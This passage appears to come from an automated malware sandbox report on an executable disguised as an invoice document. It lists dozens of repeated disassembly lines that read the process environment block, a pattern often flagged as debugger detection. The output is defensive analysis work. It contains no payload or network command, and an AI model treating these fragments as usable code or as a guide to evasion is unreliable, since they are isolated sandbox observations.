            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708550 mov eax, dword ptr fs:[00000030h]11_2_01708550
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708550 mov eax, dword ptr fs:[00000030h]11_2_01708550
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796500 mov eax, dword ptr fs:[00000030h]11_2_01796500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017025E0 mov eax, dword ptr fs:[00000030h]11_2_017025E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C5ED mov eax, dword ptr fs:[00000030h]11_2_0173C5ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C5ED mov eax, dword ptr fs:[00000030h]11_2_0173C5ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017065D0 mov eax, dword ptr fs:[00000030h]11_2_017065D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A5D0 mov eax, dword ptr fs:[00000030h]11_2_0173A5D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A5D0 mov eax, dword ptr fs:[00000030h]11_2_0173A5D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E5CF mov eax, dword ptr fs:[00000030h]11_2_0173E5CF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E5CF mov eax, dword ptr fs:[00000030h]11_2_0173E5CF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017245B1 mov eax, dword ptr fs:[00000030h]11_2_017245B1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017245B1 mov eax, dword ptr fs:[00000030h]11_2_017245B1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017805A7 mov eax, dword ptr fs:[00000030h]11_2_017805A7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E59C mov eax, dword ptr fs:[00000030h]11_2_0173E59C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702582 mov eax, dword ptr fs:[00000030h]11_2_01702582
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702582 mov ecx, dword ptr fs:[00000030h]11_2_01702582
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01734588 mov eax, dword ptr fs:[00000030h]11_2_01734588
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172A470 mov eax, dword ptr fs:[00000030h]11_2_0172A470
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C460 mov ecx, dword ptr fs:[00000030h]11_2_0178C460
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172245A mov eax, dword ptr fs:[00000030h]11_2_0172245A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA456 mov eax, dword ptr fs:[00000030h]11_2_017BA456
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E443 mov eax, dword ptr fs:[00000030h]11_2_0173E443
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F645D mov eax, dword ptr fs:[00000030h]11_2_016F645D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A430 mov eax, dword ptr fs:[00000030h]11_2_0173A430
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC427 mov eax, dword ptr fs:[00000030h]11_2_016FC427
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE420 mov eax, dword ptr fs:[00000030h]11_2_016FE420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786420 mov eax, dword ptr fs:[00000030h]11_2_01786420
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738402 mov eax, dword ptr fs:[00000030h]11_2_01738402
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017004E5 mov ecx, dword ptr fs:[00000030h]11_2_017004E5
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017344B0 mov ecx, dword ptr fs:[00000030h]11_2_017344B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178A4B0 mov eax, dword ptr fs:[00000030h]11_2_0178A4B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017064AB mov eax, dword ptr fs:[00000030h]11_2_017064AB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA49A mov eax, dword ptr fs:[00000030h]11_2_017BA49A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708770 mov eax, dword ptr fs:[00000030h]11_2_01708770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710770 mov eax, dword ptr fs:[00000030h]11_2_01710770
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700750 mov eax, dword ptr fs:[00000030h]11_2_01700750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742750 mov eax, dword ptr fs:[00000030h]11_2_01742750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742750 mov eax, dword ptr fs:[00000030h]11_2_01742750
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E75D mov eax, dword ptr fs:[00000030h]11_2_0178E75D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01784755 mov eax, dword ptr fs:[00000030h]11_2_01784755
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov esi, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov eax, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173674D mov eax, dword ptr fs:[00000030h]11_2_0173674D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177C730 mov eax, dword ptr fs:[00000030h]11_2_0177C730
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov eax, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov ecx, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173273C mov eax, dword ptr fs:[00000030h]11_2_0173273C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C720 mov eax, dword ptr fs:[00000030h]11_2_0173C720
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C720 mov eax, dword ptr fs:[00000030h]11_2_0173C720
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01700710 mov eax, dword ptr fs:[00000030h]11_2_01700710
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01730710 mov eax, dword ptr fs:[00000030h]11_2_01730710
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C700 mov eax, dword ptr fs:[00000030h]11_2_0173C700
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017047FB mov eax, dword ptr fs:[00000030h]11_2_017047FB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017047FB mov eax, dword ptr fs:[00000030h]11_2_017047FB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E7E1 mov eax, dword ptr fs:[00000030h]11_2_0178E7E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017227ED mov eax, dword ptr fs:[00000030h]11_2_017227ED
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170C7C0 mov eax, dword ptr fs:[00000030h]11_2_0170C7C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017807C3 mov eax, dword ptr fs:[00000030h]11_2_017807C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B47A0 mov eax, dword ptr fs:[00000030h]11_2_017B47A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017007AF mov eax, dword ptr fs:[00000030h]11_2_017007AF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A678E mov eax, dword ptr fs:[00000030h]11_2_017A678E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01732674 mov eax, dword ptr fs:[00000030h]11_2_01732674
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C866E mov eax, dword ptr fs:[00000030h]11_2_017C866E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C866E mov eax, dword ptr fs:[00000030h]11_2_017C866E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A660 mov eax, dword ptr fs:[00000030h]11_2_0173A660
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A660 mov eax, dword ptr fs:[00000030h]11_2_0173A660
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171C640 mov eax, dword ptr fs:[00000030h]11_2_0171C640
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01736620 mov eax, dword ptr fs:[00000030h]11_2_01736620
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01738620 mov eax, dword ptr fs:[00000030h]11_2_01738620
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E627 mov eax, dword ptr fs:[00000030h]11_2_0171E627
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170262C mov eax, dword ptr fs:[00000030h]11_2_0170262C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01742619 mov eax, dword ptr fs:[00000030h]11_2_01742619
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171260B mov eax, dword ptr fs:[00000030h]11_2_0171260B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E609 mov eax, dword ptr fs:[00000030h]11_2_0177E609
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E6F2 mov eax, dword ptr fs:[00000030h]11_2_0177E6F2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E6F2 mov eax, dword ptr fs:[00000030h]11_2_0177E6F2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E6F2 mov eax, dword ptr fs:[00000030h]11_2_0177E6F2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E6F2 mov eax, dword ptr fs:[00000030h]11_2_0177E6F2
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017806F1 mov eax, dword ptr fs:[00000030h]11_2_017806F1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017806F1 mov eax, dword ptr fs:[00000030h]11_2_017806F1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A6C7 mov ebx, dword ptr fs:[00000030h]11_2_0173A6C7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A6C7 mov eax, dword ptr fs:[00000030h]11_2_0173A6C7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017366B0 mov eax, dword ptr fs:[00000030h]11_2_017366B0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173C6A6 mov eax, dword ptr fs:[00000030h]11_2_0173C6A6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704690 mov eax, dword ptr fs:[00000030h]11_2_01704690
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704690 mov eax, dword ptr fs:[00000030h]11_2_01704690
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A4978 mov eax, dword ptr fs:[00000030h]11_2_017A4978
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A4978 mov eax, dword ptr fs:[00000030h]11_2_017A4978
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C97C mov eax, dword ptr fs:[00000030h]11_2_0178C97C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01726962 mov eax, dword ptr fs:[00000030h]11_2_01726962
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01726962 mov eax, dword ptr fs:[00000030h]11_2_01726962
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01726962 mov eax, dword ptr fs:[00000030h]11_2_01726962
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E mov eax, dword ptr fs:[00000030h]11_2_0174096E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E mov edx, dword ptr fs:[00000030h]11_2_0174096E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E mov eax, dword ptr fs:[00000030h]11_2_0174096E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4940 mov eax, dword ptr fs:[00000030h]11_2_017D4940
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780946 mov eax, dword ptr fs:[00000030h]11_2_01780946
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178892A mov eax, dword ptr fs:[00000030h]11_2_0178892A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0179892B mov eax, dword ptr fs:[00000030h]11_2_0179892B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178C912 mov eax, dword ptr fs:[00000030h]11_2_0178C912
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8918 mov eax, dword ptr fs:[00000030h]11_2_016F8918
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8918 mov eax, dword ptr fs:[00000030h]11_2_016F8918
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E908 mov eax, dword ptr fs:[00000030h]11_2_0177E908
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E908 mov eax, dword ptr fs:[00000030h]11_2_0177E908
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017329F9 mov eax, dword ptr fs:[00000030h]11_2_017329F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017329F9 mov eax, dword ptr fs:[00000030h]11_2_017329F9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178E9E0 mov eax, dword ptr fs:[00000030h]11_2_0178E9E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A9D0 mov eax, dword ptr fs:[00000030h]11_2_0170A9D0
